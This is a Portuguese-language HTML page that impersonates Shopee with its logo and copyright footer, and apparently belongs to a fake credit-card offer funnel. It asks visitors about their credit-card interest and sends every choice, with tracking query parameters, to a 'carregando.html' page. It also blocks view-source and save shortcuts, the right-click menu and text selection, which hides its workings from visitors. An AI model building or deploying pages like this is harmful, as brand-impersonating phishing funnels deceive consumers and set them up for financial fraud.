<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <script>
        function nextPage(page) {
            const currentUrl = new URL(window.location.href);

            const queryParams = currentUrl.search;

            window.location.href = page + queryParams;
        }
    </script>

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Interesse com Cart&atilde;o de Cr&eacute;dito</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap" rel="stylesheet">
    <style>
        :root {
            --primary-color: #000000;
            --primary-light: rgba(0, 0, 0, 0.1);
        }

        body {
            font-family: 'Poppins', sans-serif;
            background-color: #f9f9f9;
            color: #333;
            margin: 0;
            padding: 0;
            display: flex;
            flex-direction: column;
            min-height: 100vh;
        }

        .header {
            background-color: #ffffff;
            padding: 20px 0;
            text-align: center;
            border-bottom: 3px solid #ee4d2d;
        }

        .header img {
            width: 150px;
        }

        .main-content {
            max-width: 500px;
            background: #fff;
            margin: 30px auto;
            padding: 30px;
            border-radius: 10px;
            box-shadow: 0 4px 15px rgba(0, 0, 0, 0.1);
        }

.btn-simple {
    width: 100%;
    margin-bottom: 10px;
    padding: 12px;
    background: #ee4d2d;
    border: none;
    border-radius: 8px;
    font-weight: bold;
    color: white;
    text-align: center;
    cursor: pointer;
    transition: transform 0.3s ease, box-shadow 0.3s ease;
}

.btn-simple:hover {
    transform: scale(1.05);
    box-shadow: 0 8px 20px rgba(0, 0, 0, 0.2);
}

    .footer {
        background: #ffffff;
        border-top: 1px solid #e6e6e6;
        text-align: center;
        padding: 15px;
        font-size: 10px;
        color: #666;
    }

    </style>
    <script>
if (document.addEventListener) {
    document.addEventListener("keydown", bloquearSource);
} else { //Vers&otilde;es antigas do IE
    document.attachEvent("onkeydown", bloquearSource);
}

function bloquearSource(e) {
    e = e || window.event;

    var code = e.which || e.keyCode;

    if (
        e.ctrlKey &&
        (code == 83 || code == 85) //83 = S, 85 = U
    ) {
        if (e.preventDefault) {
            e.preventDefault();
        } else {
            e.returnValue = false;
        }

        return false;
    }
}
</script>
<style>
/*desabilita a sele&ccedil;&atilde;o no body*/
body {
    -webkit-touch-callout: none; /* iOS Safari */
      -webkit-user-select: none; /* Chrome/Safari/Opera */
       -khtml-user-select: none; /* Konqueror */
         -moz-user-select: none; /* Firefox */
          -ms-user-select: none; /* Internet Explorer/Edge */
              user-select: none;
}

/*habilita a sele&ccedil;&atilde;o nos campos editaveis*/
input, textarea {
    -webkit-touch-callout: initial; /* iOS Safari */
      -webkit-user-select: text; /* Chrome/Safari/Opera */
       -khtml-user-select: text; /* Konqueror */
         -moz-user-select: text; /* Firefox */
          -ms-user-select: text; /* Internet Explorer/Edge */
              user-select: text;
}

/*habilita a sele&ccedil;&atilde;o nos campos com o atributo contenteditable*/
[contenteditable=true] {
    -webkit-touch-callout: initial; /* iOS Safari */
      -webkit-user-select: all; /* Chrome/Safari/Opera */
       -khtml-user-select: all; /* Konqueror */
         -moz-user-select: all; /* Firefox */
          -ms-user-select: all; /* Internet Explorer/Edge */
              user-select: all;
}
</style>

<script>
if (document.addEventListener) {
    document.addEventListener("contextmenu", function(e) {
        e.preventDefault();
        return false;
    });
} else { //Vers&otilde;es antigas do IE
    document.attachEvent("oncontextmenu", function(e) {
        e = e || window.event;
        e.returnValue = false;
        return false;
    });
}
</script>
</head>

<body>
    <!-- Header -->
    <div class="header">
        <img decoding="async" style="width: 120px;" src="https://logodownload.org/wp-content/uploads/2021/03/shopee-logo.png" alt="YES Card">
    </div>

    <!-- Main Content -->
    <div style="grid-area: content; padding: 0 1rem;">
        <div style="margin-top: 18px;" class="main-content">
            <div id="InteresseCard" class="mb-3">
                <p><strong style="font-size: 18px;">Qual &eacute; o seu interesse com um cart&atilde;o de cr&eacute;dito hoje?</strong></p>
                <button class="btn-simple" onclick="nextPage('carregando.html');">Fazer uma compra espec&iacute;fica</button>
                <button class="btn-simple" onclick="nextPage('carregando.html');">Fazer uma viagem</button>
                <button class="btn-simple" onclick="nextPage('carregando.html');">Poder gastar mais</button>
                <button class="btn-simple" onclick="nextPage('carregando.html');">Organizar a minha vida financeira</button>
                <button class="btn-simple" onclick="nextPage('carregando.html');">Outros</button>
            </div>
        </div>
    </div>

    <!-- Footer -->
    <div class="footer">
Copyright &copy; 2025 Shopee. Todos os direitos reservados.<br>

Pol&iacute;tica de Privacidade | Termos de Uso Vendas e Reembolsos | Legal Mapa do Site
    </div>
</body>
</html>
